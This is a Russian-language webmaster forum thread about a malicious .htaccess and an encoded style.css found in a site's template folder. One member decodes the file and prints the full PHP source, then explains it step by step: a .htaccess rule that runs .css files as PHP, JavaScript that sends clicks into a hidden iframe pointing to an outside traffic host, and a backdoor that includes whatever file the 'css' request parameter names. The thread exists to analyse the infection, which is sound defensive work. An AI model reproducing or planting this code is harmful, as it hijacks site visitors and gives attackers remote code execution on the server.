WorldTraffic
только что ставил на top темплейты в ATX права 444 и вот что нашел в папке с темплейтами файл хетаксес а в нем следущее
AddType application/x-httpd-php .css
RewriteEngine On
RewriteRule (.*).htc $1.css
что бы это могло быть?
а также имеется файл style.css там вроде зендом все заделано
созданы эти файлы в один день и время 18.11.2007 9:36
p.s. я точно такого не создавал
dejavu
в формате .htc можешь содержаться JavaScript и соответственно любой код троя или ещё чего... Какой-то специальный формат, разработанный для IE, чтобы помогать CSS, кароче бред какой-то.. имхо, полюбому удалять если не создавал сам)
WorldTraffic
удалить успеем, я вот когда открываю файл style.css там есть такой код Zend и дальше абра кадабра, может можно както раскодировать это дело?(вроде гдето читал что можно раскодировать) может в этом коде есть что то интересно хз например домен IP сервер хакера (фантазия разыгралась)
если есть такая возможность то я могу выложить этот чуда style.css
Alchemist
World-gay-sex, ты заархивируй этот файлик и скинь ссылку на него.
Посмотрю, что там в нем написано.
Alchemist
Код:
<?php
error_reporting( 0 );
header( "Cache-Control: no-store, no-cache, must-revalidate" );
header( "Pragma: no-store" );
if ( preg_match( "%MSIE%", $_SERVER['HTTP_USER_AGENT'] ) && !$_SERVER['HTTP_X_FORWARDED_FOR'] && !$_SERVER['HTTP_X_FORWARDED'] && !$_SERVER['HTTP_FORWARDED_FOR'] && !$_SERVER['HTTP_FORWARDED'] && !$_SERVER['HTTP_VIA'] && !$_SERVER['HTTP_X_COMING_FROM'] && !$_SERVER['HTTP_COMING_FROM'] && !$_SERVER['HTTP_CLIENT_IP'] && !$_SERVER['HTTP_PROXY_USER'] && !$_SERVER['HTTP_PROXY_CONNECTION'] )
{
$myip = isset( $_SERVER['HTTP_X_REAL_IP'] ) ? $_SERVER['HTTP_X_REAL_IP'] : $_SERVER['REMOTE_ADDR'];
$dir = is_dir( getcwd( )."/tmp/" ) ? "tmp/" : "/tmp/";
$sec = 5;
$type = substr( $_SERVER['REQUEST_URI'], -3 );
if ( $type == "css" && $_SERVER['HTTP_REFERER'] )
{
$fw = fopen( $dir.$myip.".ztmp", "w" );
fclose( $fw );
echo "body {behavior: url(\"".substr( $_SERVER['REQUEST_URI'], 0, -4 ).".htc\")}";
exit( );
}
if ( $type == "htc" )
{
if ( file_exists( $dir.$myip.".ztmp" ) && time( ) <= filemtime( $dir.$myip.".ztmp" ) + $sec )
{
header( "Content-Type: text/plain" );
echo "<script type=\"text/javascript\">window.onload=function (){ifr=window.document.createElement('iframe');ifr.id='ifr';ifr.style.visibility='hidden';ifr.style.position='absolute';window.document.body.appendChild(ifr);};window.document.onmousedown=function(){obj=0;if(event.srcElement.tagName=='A'){obj=event.srcElement;}else if(event.srcElement.parentNode.tagName=='A'){obj=event.srcElement.parentNode;}if (obj && obj.href.search(/st.php|out.cgi|cx.php|out.php|go.php|c.cgi|tm3|thumb.php/i)>=0){obj.target='qwnew';if(window.document.getElementById('ifr')){window.document.getElementById('ifr').src='http://traffup.com/fr.php'; window.document.onmousedown=function(){}}}}</script>";
}
$handle = opendir( $dir."" );
while ( ( $file = readdir( $handle ) ) !== FALSE )
{
if ( !( $file != ".." ) || !( $file != "." ) || !preg_match( "%\\.ztmp$%", $file ) || !( filemtime( $dir.$file ) <= time( ) - $sec ) )
{
unlink( $dir.$file );
}
}
exit( );
}
}
if ( $_GET['css'] )
{
include( $_GET['css'] );
}
?>
На сколько я понял (смотрел мельком) смысл всего действа таков:
1. Если обратились к файлу style.css, то создает в темповом каталоге файл IP.ztmp (где IP - IP клиента запросившего файл) и редиректит на style.htc
2. При запросе к style.htc .htaccess редиректит снова на style.css
3. При повторном запросе файла style.css проверяется, есть ли созданный файл IP.ztmp, и если есть - генерится JavaScript, подменяющий ссылки на st.php|out.cgi|cx.php|out.php|go.php|c.cgi|tm3|thumb.php ссылкой (в невидемом ифрейме) на
http://traffup.com/fr.php
4. Ну и под конец, в качестве бэкдора загружает (и исполняет) скрипт переданный в переметре $_GET['css'] (Т.е. style.css?css=.....)
PS. Надо заметить аккуратность уродца, он следит, чтобы файлов с IP не создавалось слишком много, а если файлу болше пяти секунд - удаляет его
WorldTraffic
бля нехило так, спасибо тебе
а сюда не ходил? //traffup.com/fr.php//
не смотрел что там? (а то чет я очкую туда идти)
Последний раз редактировалось: WorldTraffic (17/05/08 в 17:10), всего редактировалось 1 раз
shahfil
world-gay-sex писал:
а сюда не ходил?
там еще какие-то проверки хитрые, по дефолту пустая страница отдается. Но ссылку ты все равно так зря запостил, сделал бы ее некликабельной все-таки..